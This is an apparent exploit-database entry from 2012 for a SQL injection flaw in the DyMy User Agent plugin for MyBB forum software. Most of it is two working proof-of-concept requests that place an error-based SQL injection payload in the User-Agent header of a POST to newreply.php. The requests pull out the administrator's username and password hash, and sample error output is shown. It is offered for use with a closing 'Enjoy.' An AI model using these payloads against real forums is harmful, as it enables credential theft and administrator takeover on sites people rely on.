############################################################################ # Exploit title : MyBB DyMy User Agent Plugin SQL injection vulnerability. # # Author: JoinSe7en # # Date : 13 Dec 2012 # # Tested on : Linux # # Category : Web Applications # # Software Link : http://mods.mybb.com/view/dymy-user-agent # ############################################################################ [*] PoC (receive admin username) We fire up HTTP Live Headers or a similar tool, post something and press 'replay'. We then replace our user agent with the following Query: POST http://localhost/mybb/newreply.php?ajax=1 HTTP Headers: Host: localhost User-Agent: ' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)); # Output: SQL Error: 1062 - Duplicate entry 'admin1' for key 'group_key' +------------------------------------------------------------------+ [*] PoC (receive admin password) We then replace our user agent with the following Query: POST http://localhost/mybb/newreply.php?ajax=1 HTTP Headers: Host: localhost User-Agent: ' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)); # Output: SQL Error: 1062 - Duplicate entry '098f6bcd4621d373cade4e832627b4f6' for key 'group_key' +------------------------------------------------------------------+ Enjoy.Брой прочитания на тази страница: 7322
MyBB DyMy User Agent Plugin (newreply.php) SQL Injection Vulnerability